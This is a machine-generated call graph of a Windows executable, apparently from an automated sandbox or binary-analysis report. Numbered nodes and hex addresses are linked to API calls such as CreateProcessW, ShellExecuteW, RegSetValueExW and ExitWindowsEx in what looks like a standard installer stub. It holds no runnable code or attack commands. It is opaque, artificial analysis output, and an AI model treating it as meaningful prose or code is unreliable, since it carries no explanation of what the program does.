calls 3657->3658 3659 401a05 3658->3659 3660 403857 3661 403862 3660->3661 3662 403866 3661->3662 3663 403869 GlobalAlloc 3661->3663 3663->3662 3664 4014d7 3665 402ba2 18 API calls 3664->3665 3666 4014dd Sleep 3665->3666 3668 402a4c 3666->3668 3669 40155b 3670 4029f2 3669->3670 3673 405f97 wsprintfW 3670->3673 3672 4029f7 3673->3672 3447 401ddc 3455 402ba2 3447->3455 3449 401de2 3450 402ba2 18 API calls 3449->3450 3451 401deb 3450->3451 3452 401df2 ShowWindow 3451->3452 3453 401dfd EnableWindow 3451->3453 3454 402a4c 3452->3454 3453->3454 3456 406072 18 API calls 3455->3456 3457 402bb6 3456->3457 3457->3449 3541 401bdf 3542 402ba2 18 API calls 3541->3542 3543 401be6 3542->3543 3544 402ba2 18 API calls 3543->3544 3545 401bf0 3544->3545 3546 401c00 3545->3546 3547 402bbf 18 API calls 3545->3547 3548 401c10 3546->3548 3549 402bbf 18 API calls 3546->3549 3547->3546 3550 401c1b 3548->3550 3551 401c5f 3548->3551 3549->3548 3552 402ba2 18 API calls 3550->3552 3553 402bbf 18 API calls 3551->3553 3554 401c20 3552->3554 3555 401c64 3553->3555 3556 402ba2 18 API calls 3554->3556 3557 402bbf 18 API calls 3555->3557 3558 401c29 3556->3558 3559 401c6d FindWindowExW 3557->3559 3560 401c31 SendMessageTimeoutW 3558->3560 3561 401c4f SendMessageW 3558->3561 3562 401c8f 3559->3562 3560->3562 3561->3562 3674 4022df 3675 402bbf 18 API calls 3674->3675 3676 4022ee 3675->3676 3677 402bbf 18 API calls 3676->3677 3678 4022f7 3677->3678 3679 402bbf 18 API calls 3678->3679 3680 402301 GetPrivateProfileStringW 3679->3680 3681 401960 3682 402ba2 18 API calls 3681->3682 3683 401967 3682->3683 3684 402ba2 18 API calls 3683->3684 3685 401971 3684->3685 3686 402bbf 18 API calls 3685->3686 3687 40197a 3686->3687 3688 40198e lstrlenW 3687->3688 3690 4019ca 3687->3690 3689 401998 3688->3689 3689->3690 3694 406050 lstrcpynW 3689->3694 3692 4019b3 3692->3690 3693 4019c0 lstrlenW 3692->3693 3693->3690 3694->3692 3695 404262 lstrlenW 3696 404281 3695->3696 3697 404283 WideCharToMultiByte 3695->3697 3696->3697 3698 401662 3699 402bbf 18 API calls 3698->3699 3700 401668 3699->3700 3701 406393 2 API calls 3700->3701 3702 40166e 3701->3702 3703 4019e4 3704 402bbf 18 API calls 3703->3704 3705 4019eb 3704->3705 3706 402bbf 18 API calls 3705->3706 3707 4019f4 3706->3707 3708 4019fb lstrcmpiW 3707->3708 3709 401a0d lstrcmpW 3707->3709 3710 401a01 3708->3710 3709->3710 3711 4025e5 3712 402ba2 18 API calls 3711->3712 3713 4025f4 3712->3713 3714 40263a ReadFile 3713->3714 3715 405ca8 ReadFile 3713->3715 3717 40267a MultiByteToWideChar 3713->3717 3718 40272f 3713->3718 3720 4026a0 SetFilePointer MultiByteToWideChar 3713->3720 3721 402740 3713->3721 3723 40272d 3713->3723 3724 405d06 SetFilePointer 3713->3724 3714->3713 3714->3723 3715->3713 3717->3713 3733 405f97 wsprintfW 3718->3733 3720->3713 3722 402761 SetFilePointer 3721->3722 3721->3723 3722->3723 3725 405d22 3724->3725 3731 405d3e 3724->3731 3726 405ca8 ReadFile 3725->3726 3729 405d2e 3726->3729 3727 405d47 SetFilePointer 3728 405d6f SetFilePointer 3727->3728 3730 405d52 3727->3730 3728->3731 3729->3727 3729->3728 3729->3731 3732 405cd7 WriteFile 3730->3732 3731->3713 3732->3731 3733->3723 3272 401e66 3273 402bbf 18 API calls 3272->3273 3274 401e6c 3273->3274 3275 4051af 25 API calls 3274->3275 3276 401e76 3275->3276 3277 405730 2 API calls 3276->3277 3278 401e7c 3277->3278 3279 401edb CloseHandle 3278->3279 3280 401e8c WaitForSingleObject 3278->3280 3281 40281e 3278->3281 3279->3281 3283 401e9e 3280->3283 3282 401eb0 GetExitCodeProcess 3285 401ec2 3282->3285 3286 401ecf 3282->3286 3283->3282 3284 406466 2 API calls 3283->3284 3288 401ea5 WaitForSingleObject 3284->3288 3290 405f97 wsprintfW 3285->3290 3286->3279 3287 401ecd 3286->3287 3287->3279 3288->3283 3290->3287 3291 401767 3292 402bbf 18 API calls 3291->3292 3293 40176e 3292->3293 3294 401796 3293->3294 3295 40178e 3293->3295 3331 406050 lstrcpynW 3294->3331 3330 406050 lstrcpynW 3295->3330 3298 4017a1 3300 405a04 3 API calls 3298->3300 3299 401794 3302 4062e4 5 API calls 3299->3302 3301 4017a7 lstrcatW 3300->3301 3301->3299 3318 4017b3 3302->3318 3303 406393 2 API calls 3303->3318 3305 405c00 2 API calls 3305->3318 3306 4017c5 CompareFileTime 3306->3318 3307 401885 3309 4051af 25 API calls 3307->3309 3308 40185c 3310 4051af 25 API calls 3308->3310 3319 401871 3308->3319 3312 40188f 3309->3312 3310->3319 3311 406050 lstrcpynW 3311->3318 3313 403027 32 API calls 3312->3313 3314 4018a2 3313->3314 3315 4018b6 SetFileTime 3314->3315 3317 4018c8 CloseHandle 3314->3317 3315->3317 3316 406072 18 API calls 3316->3318 3317->3319 3320 4018d9 3317->3320 3318->3303 3318->3305 3318->3306 3318->3307 3318->3308 3318->3311 3318->3316 3327 405795 MessageBoxIndirectW 3318->3327 3329 405c25 GetFileAttributesW CreateFileW 3318->3329 3321 4018f1 3320->3321 3322 4018de 3320->3322 3324 406072 18 API calls 3321->3324 3323 406072 18 API calls 3322->3323 3325 4018e6 lstrcatW 3323->3325 3326 4018f9 3324->3326 3325->3326 3328 405795 MessageBoxIndirectW 3326->3328 3327->3318 3328->3319 3329->3318 3330->3299 3331->3298 3734 404568 3735 404578 3734->3735 3736 40459e 3734->3736 3737 404114 19 API calls 3735->3737 3738 40417b 8 API calls 3736->3738 3739 404585 SetDlgItemTextW 3737->3739 3740 4045aa 3738->3740 3739->3736 3741 401ee9 3742 402bbf 18 API calls 3741->3742 3743 401ef0 3742->3743 3744 406393 2 API calls 3743->3744 3745 401ef6 3744->3745 3747 401f07 3745->3747 3748 405f97 wsprintfW 3745->3748 3748->3747 3749 4021ea 3750 402bbf 18 API calls 3749->3750 3751 4021f0 3750->3751 3752 402bbf 18 API calls 3751->3752 3753 4021f9 3752->3753 3754 402bbf 18 API calls 3753->3754 3755 402202 3754->3755 3756 406393 2 API calls 3755->3756 3757 40220b 3756->3757 3758 40221c lstrlenW lstrlenW 3757->3758 3759 40220f 3757->3759 3761 4051af 25 API calls 3758->3761 3760 4051af 25 API calls 3759->3760 3763 402217 3759->3763 3760->3763 3762 40225a SHFileOperationW 3761->3762 3762->3759 3762->3763 3764 40156b 3765 401584 3764->3765 3766 40157b ShowWindow 3764->3766 3767 401592 ShowWindow 3765->3767 3768 402a4c 3765->3768 3766->3765 3767->3768 3332 4052ee 3333 405498 3332->3333 3334 40530f GetDlgItem GetDlgItem GetDlgItem 3332->3334 3335 4054a1 GetDlgItem CreateThread CloseHandle 3333->3335 3336 4054c9 3333->3336 3377 404149 SendMessageW 3334->3377 3335->3336 3400 405282 5 API calls 3335->3400 3339 4054f4 3336->3339 3340 4054e0 ShowWindow ShowWindow 3336->3340 3341 405519 3336->3341 3338 40537f 3343 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3338->3343 3342 405554 3339->3342 3345 405508 3339->3345 3346 40552e ShowWindow 3339->3346 3382 404149 SendMessageW 3340->3382 3386 40417b 3341->3386 3342->3341 3350 405562 SendMessageW 3342->3350 3348 4053f4 3343->3348 3349 4053d8 SendMessageW SendMessageW 3343->3349 3383 4040ed 3345->3383 3352 405540 3346->3352 3353 40554e 3346->3353 3355 405407 3348->3355 3356 4053f9 SendMessageW 3348->3356 3349->3348 3357 405527 3350->3357 3358 40557b CreatePopupMenu 3350->3358 3359 4051af 25 API calls 3352->3359 3354 4040ed SendMessageW 3353->3354 3354->3342 3378 404114 3355->3378 3356->3355 3360 406072 18 API calls 3358->3360 3359->3353 3362 40558b AppendMenuW 3360->3362 3364 4055a8 GetWindowRect 3362->3364 3365 4055bb TrackPopupMenu 3362->3365 3363 405417 3366 405420 ShowWindow 3363->3366 3367 405454 GetDlgItem SendMessageW 3363->3367 3364->3365 3365->3357 3368 4055d6 3365->3368 3369 405443 3366->3369 3370 405436 ShowWindow 3366->3370 3367->3357 3371 40547b SendMessageW SendMessageW 3367->3371 3372 4055f2 SendMessageW 3368->3372 3381 404149 SendMessageW 3369->3381 3370->3369 3371->3357 3372->3372 3373 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3372->3373 3375 405634 SendMessageW 3373->3375 3375->3375 3376 40565d GlobalUnlock SetClipboardData CloseClipboard 3375->3376 3376->3357 3377->3338 3379 406072 18 API calls 3378->3379 3380 40411f SetDlgItemTextW 3379->3380 3380->3363 3381->3367 3382->3339 3384 4040f4 3383->3384 3385 4040fa SendMessageW 3383->3385 3384->3385 3385->3341 3387 404193 GetWindowLongW 3386->3387 3397 40421c 3386->3397 3388 4041a4 3387->3388 3387->3397 3389 4041b3 GetSysColor 3388->3389 3390 4041b6 3388->3390 3389->3390 3391 4041c6 SetBkMode 3390->3391 3392 4041bc SetTextColor 3390->3392 3393 4041e4 3391->3393 3394 4041de GetSysColor 3391->3394 3392->3391 3395 4041f5 3393->3395 3396 4041eb SetBkColor 3393->3396 3394->3393 3395->3397 3398 404208 DeleteObject 3395->3398 3399 40420f CreateBrushIndirect 3395->3399 3396->3395 3397->3357 3398->3399 3399->3397 3769 40226e 3770 402275 3769->3770 3774 402288 3769->3774 3771 406072 18 API calls 3770->3771 3772 402282 3771->3772 3773 405795 MessageBoxIndirectW 3772->3773 3773->3774 3775 4014f1 SetForegroundWindow 3776 402a4c 3775->3776 3777 401673 3778 402bbf 18 API calls 3777->3778 3779 40167a 3778->3779 3780 402bbf 18 API calls 3779->3780 3781 401683 3780->3781 3782 402bbf 18 API calls 3781->3782 3783 40168c MoveFileW 3782->3783 3784 401698 3783->3784 3785 40169f 3783->3785 3786 401423 25 API calls 3784->3786 3787 406393 2 API calls 3785->3787 3789 4021e1 3785->3789 3786->3789 3788 4016ae 3787->3788 3788->3789 3790 405ef1 38 API calls 3788->3790 3790->3784 3791 401cfa GetDlgItem GetClientRect 3792 402bbf 18 API calls 3791->3792 3793 401d2c LoadImageW SendMessageW 3792->3793 3794 401d4a DeleteObject 3793->3794 3795 402a4c 3793->3795 3794->3795 3433 4027fb 3434 402bbf 18 API calls 3433->3434 3435 402802 FindFirstFileW 3434->3435 3436 40282a 3435->3436 3440 402815 3435->3440 3437 402833 3436->3437 3441 405f97 wsprintfW 3436->3441 3442 406050 lstrcpynW 3437->3442 3441->3437 3442->3440 3796 40237b 3797 402381 3796->3797 3798 402bbf 18 API calls 3797->3798 3799 402393 3798->3799 3800 402bbf 18 API calls 3799->3800 3801 40239d RegCreateKeyExW 3800->3801 3802 4023c7 3801->3802 3803 402a4c 3801->3803 3804 4023e2 3802->3804 3806 402bbf 18 API calls 3802->3806 3805 4023ee 3804->3805 3807 402ba2 18 API calls 3804->3807 3808 402409 RegSetValueExW 3805->3808 3810 403027 32 API calls 3805->3810 3809 4023d8 lstrlenW 3806->3809 3807->3805 3811 40241f RegCloseKey 3808->3811 3809->3804 3810->3808 3811->3803 3813 4014ff 3814 401507 3813->3814 3816 40151a 3813->3816 3815 402ba2 18 API calls 3814->3815 3815->3816 3817 401000 3818 401037 BeginPaint GetClientRect 3817->3818 3819 40100c DefWindowProcW 3817->3819 3821 4010f3 3818->3821 3822 401179 3819->3822 3823 401073 CreateBrushIndirect FillRect DeleteObject 3821->3823 3824 4010fc 3821->3824 3823->3821 3825 401102 CreateFontIndirectW 3824->3825 3826 401167 EndPaint 3824->3826 3825->3826 3827 401112 6 API calls 3825->3827 3826->3822 3827->3826 3828 401904 3829 40193b 3828->3829 3830 402bbf 18 API calls 3829->3830 3831 401940 3830->3831 3832 405841 69 API calls 3831->3832 3833 401949 3832->3833 3834 402d04 3835 402d16 SetTimer 3834->3835 3836 402d2f 3834->3836 3835->3836 3837 402d84 3836->3837 3838 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3836->3838 3838->3837 3839 404905 3840 404931 3839->3840 3841 404915 3839->3841 3842 404964 3840->3842 3843 404937 SHGetPathFromIDListW 3840->3843 3850 405779 GetDlgItemTextW 3841->3850 3845 40494e SendMessageW 3843->3845 3846 404947 3843->3846 3845->3842 3848 40140b 2 API calls 3846->3848 3847 404922 SendMessageW 3847->3840 3848->3845 3850->3847 3851 402786 3852 40278d 3851->3852 3853 4029f7 3851->3853 3854 402ba2 18 API calls 3852->3854 3855 402798 3854->3855 3856 40279f SetFilePointer 3855->3856 3856->3853 3857 4027af 3856->3857 3859 405f97 wsprintfW 3857->3859 3859->3853 3860 401907 3861 402bbf 18 API calls 3860->3861 3862 40190e 3861->3862 3863 405795 MessageBoxIndirectW 3862->3863 3864 401917 3863->3864 3865 401e08 3866 402bbf 18 API calls 3865->3866 3867 401e0e 3866->3867 3868 402bbf 18 API calls 3867->3868 3869 401e17 3868->3869 3870 402bbf 18 API calls 3869->3870 3871 401e20 3870->3871 3872 402bbf 18 API calls 3871->3872 3873 401e29 3872->3873 3874 401423 25 API calls 3873->3874 3875 401e30 ShellExecuteW 3874->3875 3876 401e61 3875->3876 3882 401a15 3883 402bbf 18 API calls 3882->3883 3884 401a1e ExpandEnvironmentStringsW 3883->3884 3885 401a32 3884->3885 3887 401a45 3884->3887 3886 401a37 lstrcmpW 3885->3886 3885->3887 3886->3887 3888 402515 3889 402bbf 18 API calls 3888->3889 3890 40251c 3889->3890 3893 405c25 GetFileAttributesW CreateFileW 3890->3893 3892 402528 3893->3892 3894 402095 3895 402bbf 18 API calls 3894->3895 3896 40209c 3895->3896 3897 402bbf 18 API calls 3896->3897 3898 4020a6 3897->3898 3899 402bbf 18 API calls 3898->3899 3900 4020b0 3899->3900 3901 402bbf 18 API calls 3900->3901 3902 4020ba 3901->3902 3903 402bbf 18 API calls 3902->3903 3905 4020c4 3903->3905 3904 402103 CoCreateInstance 3909 402122 3904->3909 3905->3904 3906 402bbf 18 API calls 3905->3906 3906->3904 3907 401423 25 API calls 3908 4021e1 3907->3908 3909->3907 3909->3908 3910 401b16 3911 402bbf 18 API calls 3910->3911 3912 401b1d 3911->3912 3913 402ba2 18 API calls 3912->3913 3914 401b26 wsprintfW 3913->3914 3915 402a4c 3914->3915 3443 40159b 3444 402bbf 18 API calls 3443->3444 3445 4015a2 SetFileAttributesW 3444->3445 3446 4015b4 3445->3446 3531 40229d 3532 4022a5 3531->3532 3533 4022ab 3531->3533 3534 402bbf 18 API calls 3532->3534 3535 4022b9 3533->3535 3536 402bbf 18 API calls 3533->3536 3534->3533 3537 4022c7 3535->3537 3538 402bbf 18 API calls 3535->3538 3536->3535 3539 402bbf 18 API calls 3537->3539 3538->3537 3540 4022d0 WritePrivateProfileStringW 3539->3540 3916 401f1d 3917 402bbf 18 API calls 3916->3917 3918 401f24 3917->3918 3919 40642a 5 API calls 3918->3919 3920 401f33 3919->3920 3921 401f4f GlobalAlloc 3920->3921 3923 401fb7 3920->3923 3922 401f63 3921->3922 3921->3923 3924 40642a 5 API calls 3922->3924 3925 401f6a 3924->3925 3926 40642a 5 API calls 3925->3926 3927 401f74 3926->3927 3927->3923 3931 405f97 wsprintfW 3927->3931 3929 401fa9 3932 405f97 wsprintfW 3929->3932 3931->3929 3932->3923 3933 40149e 3934 402288 3933->3934 3935 4014ac PostQuitMessage 3933->3935 3935->3934 3936 40249e 3937 402cc9 19 API calls 3936->3937 3938 4024a8 3937->3938 3939 402ba2 18 API calls 3938->3939 3940 4024b1 3939->3940 3941 4024d5 RegEnumValueW 3940->3941 3942 4024c9 RegEnumKeyW 3940->3942 3944 40281e 3940->3944 3943 4024ee RegCloseKey 3941->3943 3941->3944 3942->3943 3943->3944 3563 40231f 3564 402324 3563->3564 3565 40234f 3563->3565 3586 402cc9 3564->3586 3567 402bbf 18 API calls 3565->3567 3569 402356 3567->3569 3568 40232b 3570 402335 3568->3570 3574 40236c 3568->3574 3575 402bff RegOpenKeyExW 3569->3575 3571 402bbf 18 API calls 3570->3571 3572 40233c RegDeleteValueW RegCloseKey 3571->3572 3572->3574 3576 402c93 3575->3576 3583 402c2a 3575->3583 3576->3574 3577 402c50 RegEnumKeyW 3578 402c62 RegCloseKey 3577->3578 3577->3583 3580 40642a 5 API calls 3578->3580 3579 402c87 RegCloseKey 3585 402c76 3579->3585 3582 402c72 3580->3582 3581 402bff 5 API calls 3581->3583 3584 402ca2 RegDeleteKeyW 3582->3584 3582->3585 3583->3577 3583->3578 3583->3579 3583->3581 3584->3585 3585->3576 3587 402bbf 18 API calls 3586->3587 3588 402ce2 3587->3588 3589 402cf0 RegOpenKeyExW 3588->3589 3589->3568 2761 4032a0 SetErrorMode GetVersion 2762 4032d5 2761->2762 2763 4032db 2761->2763 2764 40642a 5 API calls 2762->2764 2849 4063ba GetSystemDirectoryW 2763->2849 2764->2763 2766 4032f1 lstrlenA 2766->2763 2767 403301 2766->2767 2852 40642a GetModuleHandleA 2767->2852 2770 40642a 5 API calls 2771 403310 #17 OleInitialize SHGetFileInfoW 2770->2771 2858 406050 lstrcpynW 2771->2858 2773 40334d GetCommandLineW 2859 406050 lstrcpynW 2773->2859 2775 40335f GetModuleHandleW 2776 403377 2775->2776 2860 405a31 2776->2860 2779 4034b0 GetTempPathW 2864 40326f 2779->2864 2781 4034c8 2782 403522 DeleteFileW 2781->2782 2783 4034cc GetWindowsDirectoryW lstrcatW 2781->2783 2874 402dee GetTickCount GetModuleFileNameW 2782->2874 2784 40326f 12 API calls 2783->2784 2787 4034e8 2784->2787 2785 405a31 CharNextW 2789 40339f 2785->2789 2787->2782 2790 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2787->2790 2788 403536 2798 405a31 CharNextW 2788->2798 2832 4035d9 2788->2832 2844 4035e9 2788->2844 2789->2785 2792 40349b 2789->2792 2794 403499 2789->2794 2793 40326f 12 API calls 2790->2793 2958 406050 lstrcpynW 2792->2958 2796 40351a 2793->2796 2794->2779 2796->2782 2796->2844 2802 403555 2798->2802 2800 403723 2804 40372b GetCurrentProcess OpenProcessToken 2800->2804 2805 4037a7 ExitProcess 2800->2805 2801 403603 2982 405795 2801->2982 2807 4035b3 2802->2807 2808 403619 2802->2808 2810 403743 LookupPrivilegeValueW AdjustTokenPrivileges 2804->2810 2811 403777 2804->2811 2959 405b0c 2807->2959 2986 405718 2808->2986 2810->2811 2814 40642a 5 API calls 2811->2814 2817 40377e 2814->2817 2820 403793 ExitWindowsEx 2817->2820 2821 4037a0 2817->2821 2818 40363a lstrcatW lstrcmpiW 2823 403656 2818->2823 2818->2844 2819 40362f lstrcatW 2819->2818 2820->2805 2820->2821 3024 40140b 2821->3024 2826 403662 2823->2826 2827 40365b 2823->2827 2825 4035ce 2974 406050 lstrcpynW 2825->2974 2994 4056fb CreateDirectoryW 2826->2994 2989 40567e CreateDirectoryW 2827->2989 2831 403667 SetCurrentDirectoryW 2834 403682 2831->2834 2835 403677 2831->2835 2902 403899 2832->2902 2998 406050 lstrcpynW 2834->2998 2997 406050 lstrcpynW 2835->2997 2840 4036ce CopyFileW 2846 403690 2840->2846 2841 403717 2842 405ef1 38 API calls 2841->2842 2842->2844 2975 4037bf 2844->2975 2845 406072 18 API calls 2845->2846 2846->2841 2846->2845 2848 403702 CloseHandle 2846->2848 2999 406072 2846->2999 3017 405ef1 MoveFileExW 2846->3017 3021 405730 CreateProcessW 2846->3021 2848->2846 2850 4063dc wsprintfW LoadLibraryExW 2849->2850 2850->2766 2853 406450 GetProcAddress 2852->2853 2854 406446 2852->2854 2855 403309 2853->2855 2856 4063ba 3 API calls 2854->2856 2855->2770 2857 40644c 2856->2857 2857->2853 2857->2855 2858->2773 2859->2775 2861 405a37 2860->2861 2862 403386 CharNextW 2861->2862 2863 405a3e CharNextW 2861->2863 2862->2779 2862->2789 2863->2861 3027 4062e4 2864->3027 2866 403285 2866->2781 2867 40327b 2867->2866 3036 405a04 lstrlenW CharPrevW 2867->3036 2870 4056fb 2 API calls 2871 403293 2870->2871 3039 405c54 2871->3039 3043 405c25 GetFileAttributesW CreateFileW 2874->3043 2876 402e2e 2900 402e3e 2876->2900 3044 406050 lstrcpynW 2876->3044 2878 402e54 3045 405a50 lstrlenW 2878->3045 2882 402e65 GetFileSize 2883 402f61 2882->2883 2901 402e7c 2882->2901 3050 402d8a 2883->3050 2885 402f6a 2887 402f9a GlobalAlloc 2885->2887 2885->2900 3085 403258 SetFilePointer 2885->3085 3061 403258 SetFilePointer 2887->3061 2888 402fcd 2892 402d8a 6 API calls 2888->2892 2891 402fb5 3062 403027 2891->3062 2892->2900 2893 402f83 2895 403242 ReadFile 2893->2895 2897 402f8e 2895->2897 2896 402d8a 6 API calls 2896->2901 2897->2887 2897->2900 2898 402fc1 2898->2898 2899 402ffe SetFilePointer 2898->2899 2898->2900 2899->2900 2900->2788 2901->2883 2901->2888 2901->2896 2901->2900 3082 403242 2901->3082 2903 40642a 5 API calls 2902->2903 2904 4038ad 2903->2904 2905 4038b3 2904->2905 2906 4038c5 2904->2906 3122 405f97 wsprintfW 2905->3122 3123 405f1d RegOpenKeyExW 2906->3123 2909 403914 lstrcatW 2912 4038c3 2909->2912 2911 405f1d 3 API calls 2911->2909 3106 403b6f 2912->3106 2915 405b0c 18 API calls 2916 403946 2915->2916 2917 4039da 2916->2917 2919 405f1d 3 API calls 2916->2919 2918 405b0c 18 API calls 2917->2918 2920 4039e0 2918->2920 2922 403978 2919->2922 2921 4039f0 LoadImageW 2920->2921 2923 406072 18 API calls 2920->2923 2924 403a96 2921->2924 2925 403a17 RegisterClassW 2921->2925 2922->2917 2926 403999 lstrlenW 2922->2926 2929 405a31 CharNextW 2922->2929 2923->2921 2928 40140b 2 API calls 2924->2928 2927 403a4d SystemParametersInfoW CreateWindowExW 2925->2927 2957 403aa0 2925->2957 2930 4039a7 lstrcmpiW 2926->2930 2931 4039cd 2926->2931 2927->2924 2932 403a9c 2928->2932 2933 403996 2929->2933 2930->2931 2934 4039b7 GetFileAttributesW 2930->2934 2935 405a04 3 API calls 2931->2935 2937 403b6f 19 API calls 2932->2937 2932->2957 2933->2926 2936 4039c3 2934->2936 2938 4039d3 2935->2938 2936->2931 2939 405a50 2 API calls 2936->2939 2940 403aad 2937->2940 3128 406050 lstrcpynW 2938->3128 2939->2931 2942 403ab9 ShowWindow 2940->2942 2943 403b3c 2940->2943 2945 4063ba 3 API calls 2942->2945 3115 405282 OleInitialize 2943->3115 2947 403ad1 2945->2947 2946 403b42 2948 403b46 2946->2948 2949 403b5e 2946->2949 2950 403adf GetClassInfoW 2947->2950 2952 4063ba 3 API calls 2947->2952 2956 40140b 2 API calls 2948->2956 2948->2957 2951 40140b 2 API calls 2949->2951 2953 403af3 GetClassInfoW RegisterClassW 2950->2953 2954 403b09 DialogBoxParamW 2950->2954 2951->2957 2952->2950 2953->2954 2955 40140b 2 API calls 2954->2955 2955->2957 2956->2957 2957->2844 2958->2794 3137 406050 lstrcpynW 2959->3137 2961 405b1d 3138 405aaf CharNextW CharNextW 2961->3138 2964 4035bf 2964->2844 2973 406050 lstrcpynW 2964->2973 2965 4062e4 5 API calls 2971 405b33 2965->2971 2966 405b64 lstrlenW 2967 405b6f 2966->2967 2966->2971 2969 405a04 3 API calls 2967->2969 2970 405b74 GetFileAttributesW 2969->2970 2970->2964 2971->2964 2971->2966 2972 405a50 2 API calls 2971->2972 3144 406393 FindFirstFileW 2971->3144 2972->2966 2973->2825 2974->2832 2976 4037d7 2975->2976 2977 4037c9 CloseHandle 2975->2977 3147 403804 2976->3147 2977->2976 2983 4057aa 2982->2983 2984 403611 ExitProcess 2983->2984 2985 4057be MessageBoxIndirectW 2983->2985 2985->2984 2987 40642a 5 API calls 2986->2987 2988 40361e lstrcatW 2987->2988 2988->2818 2988->2819 2990 403660 2989->2990 2991 4056cf GetLastError 2989->2991 2990->2831 2991->2990 2992 4056de SetFileSecurityW 2991->2992 2992->2990 2993 4056f4 GetLastError 2992->2993 2993->2990 2995 40570b 2994->2995 2996 40570f GetLastError 2994->2996 2995->2831 2996->2995 2997->2834 2998->2846 3014 40607f 2999->3014 3000 4062ca 3001 4036c1 DeleteFileW 3000->3001 3205 406050 lstrcpynW 3000->3205 3001->2840 3001->2846 3003 406132 GetVersion 3003->3014 3004 406298 lstrlenW 3004->3014 3007 406072 10 API calls 3007->3004 3008 405f1d 3 API calls 3008->3014 3009 4061ad GetSystemDirectoryW 3009->3014 3010 4061c0 GetWindowsDirectoryW 3010->3014 3011 4062e4 5 API calls 3011->3014 3012 406072 10 API calls 3012->3014 3013 406239 lstrcatW 3013->3014 3014->3000 3014->3003 3014->3004 3014->3007 3014->3008 3014->3009 3014->3010 3014->3011 3014->3012 3014->3013 3015 4061f4 SHGetSpecialFolderLocation 3014->3015 3203 405f97 wsprintfW 3014->3203 3204 406050 lstrcpynW 3014->3204 3015->3014 3016 40620c SHGetPathFromIDListW CoTaskMemFree 3015->3016 3016->3014 3018 405f05 3017->3018 3020 405f12 3017->3020 3206 405d7f lstrcpyW 3018->3206 3020->2846 3022 405763 CloseHandle 3021->3022 3023 40576f 3021->3023 3022->3023 3023->2846 3025 401389 2 API calls 3024->3025 3026 401420 3025->3026 3026->2805 3034 4062f1 3027->3034 3028 406367 3029 40636c CharPrevW 3028->3029 3031 40638d 3028->3031 3029->3028 3030 40635a CharNextW 3030->3028 3030->3034 3031->2867 3032 405a31 CharNextW 3032->3034 3033 406346 CharNextW 3033->3034 3034->3028 3034->3030 3034->3032 3034->3033 3035 406355 CharNextW 3034->3035 3035->3030 3037 405a20 lstrcatW 3036->3037 3038 40328d 3036->3038 3037->3038 3038->2870 3040 405c61 GetTickCount GetTempFileNameW 3039->3040 3041 40329e 3040->3041 3042 405c97 3040->3042 3041->2781 3042->3040 3042->3041 3043->2876 3044->2878 3046 405a5e 3045->3046 3047 402e5a 3046->3047 3048 405a64 CharPrevW 3046->3048 3049 406050 lstrcpynW 3047->3049 3048->3046 3048->3047 3049->2882 3051 402d93 3050->3051 3052 402dab 3050->3052 3055 402da3 3051->3055 3056 402d9c DestroyWindow 3051->3056 3053 402db3 3052->3053 3054 402dbb GetTickCount 3052->3054 3086 406466 3053->3086 3058 402dc9 CreateDialogParamW ShowWindow 3054->3058 3059 402dec 3054->3059 3055->2885 3056->3055 3058->3059 3059->2885 3061->2891 3063 403040 3062->3063 3064 40306e 3063->3064 3103 403258 SetFilePointer 3063->3103 3066 403242 ReadFile 3064->3066 3067 403079 3066->3067 3068 4031db 3067->3068 3069 40308b GetTickCount 3067->3069 3070 4031c5 3067->3070 3071 40321d 3068->3071 3074 4031df 3068->3074 3069->3070 3078 4030da 3069->3078 3070->2898 3073 403242 ReadFile 3071->3073 3072 403242 ReadFile 3072->3078 3073->3070 3074->3070 3075 403242 ReadFile 3074->3075 3076 405cd7 WriteFile 3074->3076 3075->3074 3076->3074 3077 403130 GetTickCount 3077->3078 3078->3070 3078->3072 3078->3077 3079 403155 MulDiv wsprintfW 3078->3079 3101 405cd7 WriteFile 3078->3101 3090 4051af 3079->3090 3104 405ca8 ReadFile 3082->3104 3085->2893 3087 406483 PeekMessageW 3086->3087 3088 402db9 3087->3088 3089 406479 DispatchMessageW 3087->3089 3088->2885 3089->3087 3091 4051ca 3090->3091 3100 40526c 3090->3100 3092 4051e6 lstrlenW 3091->3092 3093 406072 18 API calls 3091->3093 3094 4051f4 lstrlenW 3092->3094 3095 40520f 3092->3095 3093->3092 3096 405206 lstrcatW 3094->3096 3094->3100 3097 405222 3095->3097 3098 405215 SetWindowTextW 3095->3098 3096->3095 3099 405228 SendMessageW SendMessageW SendMessageW 3097->3099 3097->3100 3098->3097 3099->3100 3100->3078 3102 405cf5 3101->3102 3102->3078 3103->3064 3105 403255 3104->3105 3105->2901 3107 403b83 3106->3107 3129 405f97 wsprintfW 3107->3129 3109 403bf4 3110 406072 18 API calls 3109->3110 3111 403c00 SetWindowTextW 3110->3111 3112 403924 3111->3112 3113 403c1c 3111->3113 3112->2915 3113->3112 3114 406072 18 API calls 3113->3114 3114->3113 3130 404160 3115->3130 3117 4052cc 3118 404160 SendMessageW 3117->3118 3119 4052de CoUninitialize 3118->3119 3119->2946 3120 4052a5 3120->3117 3133 401389 3120->3133 3122->2912 3124 4038f5 3123->3124 3125 405f51 RegQueryValueExW 3123->3125 3124->2909 3124->2911 3127 405f72 RegCloseKey 3125->3127 3127->3124 3128->2917 3129->3109 3131 404178 3130->3131 3132 404169 SendMessageW 3130->3132 3131->3120 3132->3131 3135 401390 3133->3135 3134 4013fe 3134->3120 3135->3134 3136 4013cb MulDiv SendMessageW 3135->3136 3136->3135 3137->2961 3139 405acc 3138->3139 3140 405ade 3138->3140 3139->3140 3141 405ad9 CharNextW 3139->3141 3142 405a31 CharNextW 3140->3142 3143 405b02 3140->3143 3141->3143 3142->3140 3143->2964 3143->2965 3145 4063b4 3144->3145 3146 4063a9 FindClose 3144->3146 3145->2971 3146->3145 3149 403812 3147->3149 3148 4037dc 3151 405841 3148->3151 3149->3148 3150 403817 FreeLibrary GlobalFree 3149->3150 3150->3148 3150->3150 3152 405b0c 18 API calls 3151->3152 3153 405861 3152->3153 3154 405880 3153->3154 3155 405869 DeleteFileW 3153->3155 3157 4059ab 3154->3157 3190 406050 lstrcpynW 3154->3190 3156 4035f2 OleUninitialize 3155->3156 3156->2800 3156->2801 3157->3156 3162 406393 2 API calls 3157->3162 3159 4058a6 3160 4058b9 3159->3160 3161 4058ac lstrcatW 3159->3161 3164 405a50 2 API calls 3160->3164 3163 4058bf 